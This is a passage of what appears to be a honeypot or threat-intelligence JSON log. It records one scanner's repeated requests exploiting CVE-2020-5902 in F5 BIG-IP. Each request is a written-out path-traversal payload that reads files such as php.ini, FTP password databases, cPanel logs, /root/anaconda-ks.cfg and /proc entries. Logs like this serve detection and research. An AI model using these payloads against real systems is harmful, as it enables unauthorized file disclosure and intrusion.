  2343. "first_seen": "2020-07-09T08:04:58Z",
  2344. "last_seen": "2020-07-09T08:04:58Z"
  2345. },
  2346. {
  2347. "event_id": "745c63a47f24e7e589551bc3125dbe515ad3508c94ba30021845599b970ad8ad",
  2348. "source_ip_address": "85.248.227.163",
  2349. "country": "SK",
  2350. "user_agent": "python-requests/2.23.0",
  2351. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php4/httpd.conf HTTP/1.1",
  2352. "post_data": "",
  2353. "target_port": 443,
  2354. "protocol": "tcp",
  2355. "tags": [
  2356. {
  2357. "cve": "CVE-2020-5902",
  2358. "category": "Platform",
  2359. "description": "F5 BIG-IP Configuration Utility RCE"
  2360. }
  2361. ],
  2362. "event_count": 1,
  2363. "first_seen": "2020-07-09T08:04:57Z",
  2364. "last_seen": "2020-07-09T08:04:57Z"
  2365. },
  2366. {
  2367. "event_id": "725f13f4adb136a862a30e5a5c47fc258990089d42b654f4d7c46090fa6afda8",
  2368. "source_ip_address": "85.248.227.163",
  2369. "country": "SK",
  2370. "user_agent": "python-requests/2.23.0",
  2371. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/lib/php.ini HTTP/1.1",
  2372. "post_data": "",
  2373. "target_port": 443,
  2374. "protocol": "tcp",
  2375. "tags": [
  2376. {
  2377. "cve": "CVE-2020-5902",
  2378. "category": "Platform",
  2379. "description": "F5 BIG-IP Configuration Utility RCE"
  2380. }
  2381. ],
  2382. "event_count": 1,
  2383. "first_seen": "2020-07-09T08:04:55Z",
  2384. "last_seen": "2020-07-09T08:04:55Z"
  2385. },
  2386. {
  2387. "event_id": "d1112ad9d0f7f042bbf501baaec9fb2d6707af6297a8feabdad95814e7ddd575",
  2388. "source_ip_address": "85.248.227.163",
  2389. "country": "SK",
  2390. "user_agent": "python-requests/2.23.0",
  2391. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/etc/pureftpd.pdb HTTP/1.1",
  2392. "post_data": "",
  2393. "target_port": 443,
  2394. "protocol": "tcp",
  2395. "tags": [
  2396. {
  2397. "cve": "CVE-2020-5902",
  2398. "category": "Platform",
  2399. "description": "F5 BIG-IP Configuration Utility RCE"
  2400. }
  2401. ],
  2402. "event_count": 1,
  2403. "first_seen": "2020-07-09T08:04:54Z",
  2404. "last_seen": "2020-07-09T08:04:54Z"
  2405. },
  2406. {
  2407. "event_id": "a30da7638e362534770ccc837bc3813a51a178c14d1275f5ec5c4d4ced632d4d",
  2408. "source_ip_address": "85.248.227.163",
  2409. "country": "SK",
  2410. "user_agent": "python-requests/2.23.0",
  2411. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/etc/pure-ftpd.conf HTTP/1.1",
  2412. "post_data": "",
  2413. "target_port": 443,
  2414. "protocol": "tcp",
  2415. "tags": [
  2416. {
  2417. "cve": "CVE-2020-5902",
  2418. "category": "Platform",
  2419. "description": "F5 BIG-IP Configuration Utility RCE"
  2420. }
  2421. ],
  2422. "event_count": 1,
  2423. "first_seen": "2020-07-09T08:04:52Z",
  2424. "last_seen": "2020-07-09T08:04:52Z"
  2425. },
  2426. {
  2427. "event_id": "fc0baad81e84c419280ef8d0295171afe4725fa67558e7ee387c263ddb04768e",
  2428. "source_ip_address": "85.248.227.163",
  2429. "country": "SK",
  2430. "user_agent": "python-requests/2.23.0",
  2431. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/etc/php.ini HTTP/1.1",
  2432. "post_data": "",
  2433. "target_port": 443,
  2434. "protocol": "tcp",
  2435. "tags": [
  2436. {
  2437. "cve": "CVE-2020-5902",
  2438. "category": "Platform",
  2439. "description": "F5 BIG-IP Configuration Utility RCE"
  2440. }
  2441. ],
  2442. "event_count": 1,
  2443. "first_seen": "2020-07-09T08:04:50Z",
  2444. "last_seen": "2020-07-09T08:04:50Z"
  2445. },
  2446. {
  2447. "event_id": "c295018e571a5eee75d84d5f802522c5e6254adc6d55412f1524375510dfdbf5",
  2448. "source_ip_address": "85.248.227.163",
  2449. "country": "SK",
  2450. "user_agent": "python-requests/2.23.0",
  2451. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/etc/httpd/logs/error_log HTTP/1.1",
  2452. "post_data": "",
  2453. "target_port": 443,
  2454. "protocol": "tcp",
  2455. "tags": [
  2456. {
  2457. "cve": "CVE-2020-5902",
  2458. "category": "Platform",
  2459. "description": "F5 BIG-IP Configuration Utility RCE"
  2460. }
  2461. ],
  2462. "event_count": 1,
  2463. "first_seen": "2020-07-09T08:04:49Z",
  2464. "last_seen": "2020-07-09T08:04:49Z"
  2465. },
  2466. {
  2467. "event_id": "c49869d19ec0cedd4603d1cb9bba10aaa1cd0f960bd2ff3153d88de14c0563c5",
  2468. "source_ip_address": "85.248.227.163",
  2469. "country": "SK",
  2470. "user_agent": "python-requests/2.23.0",
  2471. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/etc/httpd/logs/access_log HTTP/1.1",
  2472. "post_data": "",
  2473. "target_port": 443,
  2474. "protocol": "tcp",
  2475. "tags": [
  2476. {
  2477. "cve": "CVE-2020-5902",
  2478. "category": "Platform",
  2479. "description": "F5 BIG-IP Configuration Utility RCE"
  2480. }
  2481. ],
  2482. "event_count": 1,
  2483. "first_seen": "2020-07-09T08:04:48Z",
  2484. "last_seen": "2020-07-09T08:04:48Z"
  2485. },
  2486. {
  2487. "event_id": "e1ba21693ece5181bdec16d066fdfa40cb0b985659aaf73559e8b60da270379b",
  2488. "source_ip_address": "85.248.227.163",
  2489. "country": "SK",
  2490. "user_agent": "python-requests/2.23.0",
  2491. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/cpanel/logs/stats_log HTTP/1.1",
  2492. "post_data": "",
  2493. "target_port": 443,
  2494. "protocol": "tcp",
  2495. "tags": [
  2496. {
  2497. "cve": "CVE-2020-5902",
  2498. "category": "Platform",
  2499. "description": "F5 BIG-IP Configuration Utility RCE"
  2500. }
  2501. ],
  2502. "event_count": 1,
  2503. "first_seen": "2020-07-09T08:04:46Z",
  2504. "last_seen": "2020-07-09T08:04:46Z"
  2505. },
  2506. {
  2507. "event_id": "dbc28042a11cf8a4c369ce40213fd67286ae211b8566d23f184d187e439246ac",
  2508. "source_ip_address": "85.248.227.163",
  2509. "country": "SK",
  2510. "user_agent": "python-requests/2.23.0",
  2511. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/cpanel/logs/login_log HTTP/1.1",
  2512. "post_data": "",
  2513. "target_port": 443,
  2514. "protocol": "tcp",
  2515. "tags": [
  2516. {
  2517. "cve": "CVE-2020-5902",
  2518. "category": "Platform",
  2519. "description": "F5 BIG-IP Configuration Utility RCE"
  2520. }
  2521. ],
  2522. "event_count": 1,
  2523. "first_seen": "2020-07-09T08:04:45Z",
  2524. "last_seen": "2020-07-09T08:04:45Z"
  2525. },
  2526. {
  2527. "event_id": "63605cdf42142f7a210be569cf08ec0725c68857e1b1092d6e210d5c6bd17091",
  2528. "source_ip_address": "85.248.227.163",
  2529. "country": "SK",
  2530. "user_agent": "python-requests/2.23.0",
  2531. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/cpanel/logs/license_log HTTP/1.1",
  2532. "post_data": "",
  2533. "target_port": 443,
  2534. "protocol": "tcp",
  2535. "tags": [
  2536. {
  2537. "cve": "CVE-2020-5902",
  2538. "category": "Platform",
  2539. "description": "F5 BIG-IP Configuration Utility RCE"
  2540. }
  2541. ],
  2542. "event_count": 1,
  2543. "first_seen": "2020-07-09T08:04:43Z",
  2544. "last_seen": "2020-07-09T08:04:43Z"
  2545. },
  2546. {
  2547. "event_id": "5e5490890476075f9fa1697a944be982d62164c173447e4fb4b905b3f5990dea",
  2548. "source_ip_address": "85.248.227.163",
  2549. "country": "SK",
  2550. "user_agent": "python-requests/2.23.0",
  2551. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/cpanel/logs/error_log HTTP/1.1",
  2552. "post_data": "",
  2553. "target_port": 443,
  2554. "protocol": "tcp",
  2555. "tags": [
  2556. {
  2557. "cve": "CVE-2020-5902",
  2558. "category": "Platform",
  2559. "description": "F5 BIG-IP Configuration Utility RCE"
  2560. }
  2561. ],
  2562. "event_count": 1,
  2563. "first_seen": "2020-07-09T08:04:42Z",
  2564. "last_seen": "2020-07-09T08:04:42Z"
  2565. },
  2566. {
  2567. "event_id": "c8e37026473e4d4fe375b23b5d4688aebd77dac86910a9cdee11397535d4066d",
  2568. "source_ip_address": "85.248.227.163",
  2569. "country": "SK",
  2570. "user_agent": "python-requests/2.23.0",
  2571. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/cpanel/logs/access_log HTTP/1.1",
  2572. "post_data": "",
  2573. "target_port": 443,
  2574. "protocol": "tcp",
  2575. "tags": [
  2576. {
  2577. "cve": "CVE-2020-5902",
  2578. "category": "Platform",
  2579. "description": "F5 BIG-IP Configuration Utility RCE"
  2580. }
  2581. ],
  2582. "event_count": 1,
  2583. "first_seen": "2020-07-09T08:04:40Z",
  2584. "last_seen": "2020-07-09T08:04:40Z"
  2585. },
  2586. {
  2587. "event_id": "63db1dd04859713051112ec7ce9b45dc40d5056352e685bb7cc076502ef1f329",
  2588. "source_ip_address": "85.248.227.163",
  2589. "country": "SK",
  2590. "user_agent": "python-requests/2.23.0",
  2591. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/cpanel/logs HTTP/1.1",
  2592. "post_data": "",
  2593. "target_port": 443,
  2594. "protocol": "tcp",
  2595. "tags": [
  2596. {
  2597. "cve": "CVE-2020-5902",
  2598. "category": "Platform",
  2599. "description": "F5 BIG-IP Configuration Utility RCE"
  2600. }
  2601. ],
  2602. "event_count": 1,
  2603. "first_seen": "2020-07-09T08:04:39Z",
  2604. "last_seen": "2020-07-09T08:04:39Z"
  2605. },
  2606. {
  2607. "event_id": "1c18beeb7f74751ef70cb0ec37170aafabe7cded04d328c96e8c11cc125185b3",
  2608. "source_ip_address": "85.248.227.163",
  2609. "country": "SK",
  2610. "user_agent": "python-requests/2.23.0",
  2611. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/error.log HTTP/1.1",
  2612. "post_data": "",
  2613. "target_port": 443,
  2614. "protocol": "tcp",
  2615. "tags": [
  2616. {
  2617. "cve": "CVE-2020-5902",
  2618. "category": "Platform",
  2619. "description": "F5 BIG-IP Configuration Utility RCE"
  2620. }
  2621. ],
  2622. "event_count": 1,
  2623. "first_seen": "2020-07-09T08:04:37Z",
  2624. "last_seen": "2020-07-09T08:04:37Z"
  2625. },
  2626. {
  2627. "event_id": "d54039926893f8258aed7f64a64593e66dc22c151b79dd416ea5aacb1c4d19fd",
  2628. "source_ip_address": "85.248.227.163",
  2629. "country": "SK",
  2630. "user_agent": "python-requests/2.23.0",
  2631. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/error_log HTTP/1.1",
  2632. "post_data": "",
  2633. "target_port": 443,
  2634. "protocol": "tcp",
  2635. "tags": [
  2636. {
  2637. "cve": "CVE-2020-5902",
  2638. "category": "Platform",
  2639. "description": "F5 BIG-IP Configuration Utility RCE"
  2640. }
  2641. ],
  2642. "event_count": 1,
  2643. "first_seen": "2020-07-09T08:04:36Z",
  2644. "last_seen": "2020-07-09T08:04:36Z"
  2645. },
  2646. {
  2647. "event_id": "28d119974f7370995dd5f71e288681f935f41bdfb654e894661c08a849462080",
  2648. "source_ip_address": "85.248.227.163",
  2649. "country": "SK",
  2650. "user_agent": "python-requests/2.23.0",
  2651. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/audit_log HTTP/1.1",
  2652. "post_data": "",
  2653. "target_port": 443,
  2654. "protocol": "tcp",
  2655. "tags": [
  2656. {
  2657. "cve": "CVE-2020-5902",
  2658. "category": "Platform",
  2659. "description": "F5 BIG-IP Configuration Utility RCE"
  2660. }
  2661. ],
  2662. "event_count": 1,
  2663. "first_seen": "2020-07-09T08:04:34Z",
  2664. "last_seen": "2020-07-09T08:04:34Z"
  2665. },
  2666. {
  2667. "event_id": "2d352b6750d253bf3e7aa6eb836cb78a76de586461c89b0eeac852dff4c32531",
  2668. "source_ip_address": "85.248.227.163",
  2669. "country": "SK",
  2670. "user_agent": "python-requests/2.23.0",
  2671. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/logs/access.log HTTP/1.1",
  2672. "post_data": "",
  2673. "target_port": 443,
  2674. "protocol": "tcp",
  2675. "tags": [
  2676. {
  2677. "cve": "CVE-2020-5902",
  2678. "category": "Platform",
  2679. "description": "F5 BIG-IP Configuration Utility RCE"
  2680. }
  2681. ],
  2682. "event_count": 1,
  2683. "first_seen": "2020-07-09T08:04:33Z",
  2684. "last_seen": "2020-07-09T08:04:33Z"
  2685. },
  2686. {
  2687. "event_id": "c247d73095515cba9bb0567306e31323acee591ba12d5c1be2926ac39f6cb5b9",
  2688. "source_ip_address": "85.248.227.163",
  2689. "country": "SK",
  2690. "user_agent": "python-requests/2.23.0",
  2691. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/logs/access_log HTTP/1.1",
  2692. "post_data": "",
  2693. "target_port": 443,
  2694. "protocol": "tcp",
  2695. "tags": [
  2696. {
  2697. "cve": "CVE-2020-5902",
  2698. "category": "Platform",
  2699. "description": "F5 BIG-IP Configuration Utility RCE"
  2700. }
  2701. ],
  2702. "event_count": 1,
  2703. "first_seen": "2020-07-09T08:04:31Z",
  2704. "last_seen": "2020-07-09T08:04:31Z"
  2705. },
  2706. {
  2707. "event_id": "26980e4a69a3601a7b64c5ecf0f85f43a39f797af658ea79f7d3888c155482cd",
  2708. "source_ip_address": "85.248.227.163",
  2709. "country": "SK",
  2710. "user_agent": "python-requests/2.23.0",
  2711. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/logs HTTP/1.1",
  2712. "post_data": "",
  2713. "target_port": 443,
  2714. "protocol": "tcp",
  2715. "tags": [
  2716. {
  2717. "cve": "CVE-2020-5902",
  2718. "category": "Platform",
  2719. "description": "F5 BIG-IP Configuration Utility RCE"
  2720. }
  2721. ],
  2722. "event_count": 1,
  2723. "first_seen": "2020-07-09T08:04:30Z",
  2724. "last_seen": "2020-07-09T08:04:30Z"
  2725. },
  2726. {
  2727. "event_id": "bb2ce050aa576aadbd0c72727f7962bb1a06e1d24317b944cf2cc9081a3b4fb9",
  2728. "source_ip_address": "85.248.227.163",
  2729. "country": "SK",
  2730. "user_agent": "python-requests/2.23.0",
  2731. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/log HTTP/1.1",
  2732. "post_data": "",
  2733. "target_port": 443,
  2734. "protocol": "tcp",
  2735. "tags": [
  2736. {
  2737. "cve": "CVE-2020-5902",
  2738. "category": "Platform",
  2739. "description": "F5 BIG-IP Configuration Utility RCE"
  2740. }
  2741. ],
  2742. "event_count": 1,
  2743. "first_seen": "2020-07-09T08:04:28Z",
  2744. "last_seen": "2020-07-09T08:04:28Z"
  2745. },
  2746. {
  2747. "event_id": "5b4de1f712adf24ac7fda12ab97d9f444fe3e2cbdaafb704ed288eef04844ec2",
  2748. "source_ip_address": "85.248.227.163",
  2749. "country": "SK",
  2750. "user_agent": "python-requests/2.23.0",
  2751. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/conf/php.ini HTTP/1.1",
  2752. "post_data": "",
  2753. "target_port": 443,
  2754. "protocol": "tcp",
  2755. "tags": [
  2756. {
  2757. "cve": "CVE-2020-5902",
  2758. "category": "Platform",
  2759. "description": "F5 BIG-IP Configuration Utility RCE"
  2760. }
  2761. ],
  2762. "event_count": 1,
  2763. "first_seen": "2020-07-09T08:04:27Z",
  2764. "last_seen": "2020-07-09T08:04:27Z"
  2765. },
  2766. {
  2767. "event_id": "1154648750c954b94f6bd47777d2db01d670357b9284bbc368b441bcaec75066",
  2768. "source_ip_address": "85.248.227.163",
  2769. "country": "SK",
  2770. "user_agent": "python-requests/2.23.0",
  2771. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/apache/conf/modsec.conf HTTP/1.1",
  2772. "post_data": "",
  2773. "target_port": 443,
  2774. "protocol": "tcp",
  2775. "tags": [
  2776. {
  2777. "cve": "CVE-2020-5902",
  2778. "category": "Platform",
  2779. "description": "F5 BIG-IP Configuration Utility RCE"
  2780. }
  2781. ],
  2782. "event_count": 1,
  2783. "first_seen": "2020-07-09T08:04:26Z",
  2784. "last_seen": "2020-07-09T08:04:26Z"
  2785. },
  2786. {
  2787. "event_id": "32689d5cadbedac98e4cc110b27130b74dd39b48913d8e2abaf9b71f34196a80",
  2788. "source_ip_address": "85.248.227.163",
  2789. "country": "SK",
  2790. "user_agent": "python-requests/2.23.0",
  2791. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/lib/php/php.ini HTTP/1.1",
  2792. "post_data": "",
  2793. "target_port": 443,
  2794. "protocol": "tcp",
  2795. "tags": [
  2796. {
  2797. "cve": "CVE-2020-5902",
  2798. "category": "Platform",
  2799. "description": "F5 BIG-IP Configuration Utility RCE"
  2800. }
  2801. ],
  2802. "event_count": 1,
  2803. "first_seen": "2020-07-09T08:04:24Z",
  2804. "last_seen": "2020-07-09T08:04:24Z"
  2805. },
  2806. {
  2807. "event_id": "cd33273aaf4583f298af325f979e87a7378f690710801e517af65805149100a7",
  2808. "source_ip_address": "85.248.227.163",
  2809. "country": "SK",
  2810. "user_agent": "python-requests/2.23.0",
  2811. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/lib/php.ini HTTP/1.1",
  2812. "post_data": "",
  2813. "target_port": 443,
  2814. "protocol": "tcp",
  2815. "tags": [
  2816. {
  2817. "cve": "CVE-2020-5902",
  2818. "category": "Platform",
  2819. "description": "F5 BIG-IP Configuration Utility RCE"
  2820. }
  2821. ],
  2822. "event_count": 1,
  2823. "first_seen": "2020-07-09T08:04:23Z",
  2824. "last_seen": "2020-07-09T08:04:23Z"
  2825. },
  2826. {
  2827. "event_id": "cd4a3a986fdf91892b57d280ce52117b5430d4060ac4b402022106c8ba793d89",
  2828. "source_ip_address": "85.248.227.163",
  2829. "country": "SK",
  2830. "user_agent": "python-requests/2.23.0",
  2831. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/etc/pure-ftpd.conf HTTP/1.1",
  2832. "post_data": "",
  2833. "target_port": 443,
  2834. "protocol": "tcp",
  2835. "tags": [
  2836. {
  2837. "cve": "CVE-2020-5902",
  2838. "category": "Platform",
  2839. "description": "F5 BIG-IP Configuration Utility RCE"
  2840. }
  2841. ],
  2842. "event_count": 1,
  2843. "first_seen": "2020-07-09T08:04:21Z",
  2844. "last_seen": "2020-07-09T08:04:21Z"
  2845. },
  2846. {
  2847. "event_id": "38765218b56f41484959d432cee8398b6959d51dd39ca6d9216dabacac569b8e",
  2848. "source_ip_address": "85.248.227.163",
  2849. "country": "SK",
  2850. "user_agent": "python-requests/2.23.0",
  2851. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/root/anaconda-ks.cfg HTTP/1.1",
  2852. "post_data": "",
  2853. "target_port": 443,
  2854. "protocol": "tcp",
  2855. "tags": [
  2856. {
  2857. "cve": "CVE-2020-5902",
  2858. "category": "Platform",
  2859. "description": "F5 BIG-IP Configuration Utility RCE"
  2860. }
  2861. ],
  2862. "event_count": 1,
  2863. "first_seen": "2020-07-09T08:04:20Z",
  2864. "last_seen": "2020-07-09T08:04:20Z"
  2865. },
  2866. {
  2867. "event_id": "b350d57186b0efa10cf5a1cfdfe44eb8e8111821eb1735102cb137c37d27ddbd",
  2868. "source_ip_address": "85.248.227.163",
  2869. "country": "SK",
  2870. "user_agent": "python-requests/2.23.0",
  2871. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/net/arp HTTP/1.1",
  2872. "post_data": "",
  2873. "target_port": 443,
  2874. "protocol": "tcp",
  2875. "tags": [
  2876. {
  2877. "cve": "CVE-2020-5902",
  2878. "category": "Platform",
  2879. "description": "F5 BIG-IP Configuration Utility RCE"
  2880. }
  2881. ],
  2882. "event_count": 1,
  2883. "first_seen": "2020-07-09T08:04:18Z",
  2884. "last_seen": "2020-07-09T08:04:18Z"
  2885. },
  2886. {
  2887. "event_id": "6e820a4add65082917c2267e56b22278266df331418e499b08b6a72b96aa6aac",
  2888. "source_ip_address": "85.248.227.163",
  2889. "country": "SK",
  2890. "user_agent": "python-requests/2.23.0",
  2891. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/version HTTP/1.1",
  2892. "post_data": "",
  2893. "target_port": 443,
  2894. "protocol": "tcp",
  2895. "tags": [
  2896. {
  2897. "cve": "CVE-2020-5902",
  2898. "category": "Platform",
  2899. "description": "F5 BIG-IP Configuration Utility RCE"
  2900. }
  2901. ],
  2902. "event_count": 1,
  2903. "first_seen": "2020-07-09T08:04:17Z",
  2904. "last_seen": "2020-07-09T08:04:17Z"
  2905. },
  2906. {
  2907. "event_id": "0e7a44d259ec9a3a0a77b2dd79868ca8045ef08e7ba1baa7a5d3c8681f9933d9",
  2908. "source_ip_address": "85.248.227.163",
  2909. "country": "SK",
  2910. "user_agent": "python-requests/2.23.0",
  2911. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/swaps HTTP/1.1",
  2912. "post_data": "",
  2913. "target_port": 443,
  2914. "protocol": "tcp",
  2915. "tags": [
  2916. {
  2917. "cve": "CVE-2020-5902",
  2918. "category": "Platform",
  2919. "description": "F5 BIG-IP Configuration Utility RCE"
  2920. }
  2921. ],
  2922. "event_count": 1,
  2923. "first_seen": "2020-07-09T08:04:15Z",
  2924. "last_seen": "2020-07-09T08:04:15Z"
  2925. },
  2926. {
  2927. "event_id": "1fba0015f453d50e49165919c15653a602b1e2f8951691a8c747243b626f3d4a",
  2928. "source_ip_address": "85.248.227.163",
  2929. "country": "SK",
  2930. "user_agent": "python-requests/2.23.0",
  2931. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/stat HTTP/1.1",
  2932. "post_data": "",
  2933. "target_port": 443,
  2934. "protocol": "tcp",
  2935. "tags": [
  2936. {
  2937. "cve": "CVE-2020-5902",
  2938. "category": "Platform",
  2939. "description": "F5 BIG-IP Configuration Utility RCE"
  2940. }
  2941. ],
  2942. "event_count": 1,
  2943. "first_seen": "2020-07-09T08:04:14Z",
  2944. "last_seen": "2020-07-09T08:04:14Z"
  2945. },
  2946. {
  2947. "event_id": "89c364dd25cfc2ef6e2f0a1d1f67f2d1a8d49e4aab5223b6b07e34b5ce51ed46",
  2948. "source_ip_address": "85.248.227.163",
  2949. "country": "SK",
  2950. "user_agent": "python-requests/2.23.0",
  2951. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/mounts HTTP/1.1",
  2952. "post_data": "",
  2953. "target_port": 443,
  2954. "protocol": "tcp",
  2955. "tags": [
  2956. {
  2957. "cve": "CVE-2020-5902",
  2958. "category": "Platform",
  2959. "description": "F5 BIG-IP Configuration Utility RCE"
  2960. }
  2961. ],
  2962. "event_count": 1,
  2963. "first_seen": "2020-07-09T08:04:12Z",
  2964. "last_seen": "2020-07-09T08:04:12Z"
  2965. },
  2966. {
  2967. "event_id": "b0d2e0fafb0638f429e948cb65b1f77e7b4055bcd78b7f966b03fd1c864c256d",
  2968. "source_ip_address": "85.248.227.163",
  2969. "country": "SK",
  2970. "user_agent": "python-requests/2.23.0",
  2971. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/modules HTTP/1.1",
  2972. "post_data": "",
  2973. "target_port": 443,
  2974. "protocol": "tcp",
  2975. "tags": [
  2976. {
  2977. "cve": "CVE-2020-5902",
  2978. "category": "Platform",
  2979. "description": "F5 BIG-IP Configuration Utility RCE"
  2980. }
  2981. ],
  2982. "event_count": 1,
  2983. "first_seen": "2020-07-09T08:04:11Z",
  2984. "last_seen": "2020-07-09T08:04:11Z"
  2985. },
  2986. {
  2987. "event_id": "9619d559258e2dddc9bfc5e31406dd0a034a7418fa163ca5ac9d52e070125560",
  2988. "source_ip_address": "85.248.227.163",
  2989. "country": "SK",
  2990. "user_agent": "python-requests/2.23.0",
  2991. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/meminfo HTTP/1.1",
  2992. "post_data": "",
  2993. "target_port": 443,
  2994. "protocol": "tcp",
  2995. "tags": [
  2996. {
  2997. "cve": "CVE-2020-5902",
  2998. "category": "Platform",
  2999. "description": "F5 BIG-IP Configuration Utility RCE"
  3000. }
  3001. ],
  3002. "event_count": 1,
  3003. "first_seen": "2020-07-09T08:04:09Z",
  3004. "last_seen": "2020-07-09T08:04:09Z"
  3005. },
  3006. {
  3007. "event_id": "433c8381b3a62e7f01b471680859183999f57bca899a7f1403cfcc12c4a03b44",
  3008. "source_ip_address": "85.248.227.163",
  3009. "country": "SK",
  3010. "user_agent": "python-requests/2.23.0",
  3011. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/ioports HTTP/1.1",
  3012. "post_data": "",
  3013. "target_port": 443,
  3014. "protocol": "tcp",
  3015. "tags": [
  3016. {
  3017. "cve": "CVE-2020-5902",
  3018. "category": "Platform",
  3019. "description": "F5 BIG-IP Configuration Utility RCE"
  3020. }
  3021. ],
  3022. "event_count": 1,
  3023. "first_seen": "2020-07-09T08:04:08Z",
  3024. "last_seen": "2020-07-09T08:04:08Z"
  3025. },
  3026. {
  3027. "event_id": "bad5aaa666a7966fa6acd8aa2d9e943532893a48633cf06cafe01e820a020ef6",
  3028. "source_ip_address": "85.248.227.163",
  3029. "country": "SK",
  3030. "user_agent": "python-requests/2.23.0",
  3031. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/interrupts HTTP/1.1",
  3032. "post_data": "",
  3033. "target_port": 443,
  3034. "protocol": "tcp",
  3035. "tags": [
  3036. {
  3037. "cve": "CVE-2020-5902",
  3038. "category": "Platform",
  3039. "description": "F5 BIG-IP Configuration Utility RCE"
  3040. }
  3041. ],
  3042. "event_count": 1,
  3043. "first_seen": "2020-07-09T08:04:07Z",
  3044. "last_seen": "2020-07-09T08:04:07Z"
  3045. },
  3046. {
  3047. "event_id": "4563b96d96ac8e0624ccf009b7772878274f05fef69c66518891c67bb4ee93b2",
  3048. "source_ip_address": "85.248.227.163",
  3049. "country": "SK",
  3050. "user_agent": "python-requests/2.23.0",
  3051. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/filesystems HTTP/1.1",
  3052. "post_data": "",
  3053. "target_port": 443,
  3054. "protocol": "tcp",
  3055. "tags": [
  3056. {
  3057. "cve": "CVE-2020-5902",
  3058. "category": "Platform",
  3059. "description": "F5 BIG-IP Configuration Utility RCE"
  3060. }
  3061. ],
  3062. "event_count": 1,
  3063. "first_seen": "2020-07-09T08:04:05Z",
  3064. "last_seen": "2020-07-09T08:04:05Z"
  3065. },
  3066. {
  3067. "event_id": "8f2c7ca19afa2510c4b12187ae53a28b20561035554efae907e66f3928c9ec09",
  3068. "source_ip_address": "85.248.227.163",
  3069. "country": "SK",
  3070. "user_agent": "python-requests/2.23.0",
  3071. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/cpuinfo HTTP/1.1",
  3072. "post_data": "",
  3073. "target_port": 443,
  3074. "protocol": "tcp",
  3075. "tags": [
  3076. {
  3077. "cve": "CVE-2020-5902",
  3078. "category": "Platform",
  3079. "description": "F5 BIG-IP Configuration Utility RCE"
  3080. }
  3081. ],
  3082. "event_count": 1,
  3083. "first_seen": "2020-07-09T08:04:04Z",
  3084. "last_seen": "2020-07-09T08:04:04Z"
  3085. },
  3086. {
  3087. "event_id": "94380604bd9bf33bbd4d2533ffe8800928095f0d109c96624c667773ee20a6d7",
  3088. "source_ip_address": "85.248.227.163",
  3089. "country": "SK",
  3090. "user_agent": "python-requests/2.23.0",
  3091. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/opt/xampp/etc/php.ini HTTP/1.1",
  3092. "post_data": "",
  3093. "target_port": 443,
  3094. "protocol": "tcp",
  3095. "tags": [
  3096. {
  3097. "cve": "CVE-2020-5902",
  3098. "category": "Platform",
  3099. "description": "F5 BIG-IP Configuration Utility RCE"
  3100. }
  3101. ],
  3102. "event_count": 1,
  3103. "first_seen": "2020-07-09T08:04:02Z",
  3104. "last_seen": "2020-07-09T08:04:02Z"
  3105. },
  3106. {
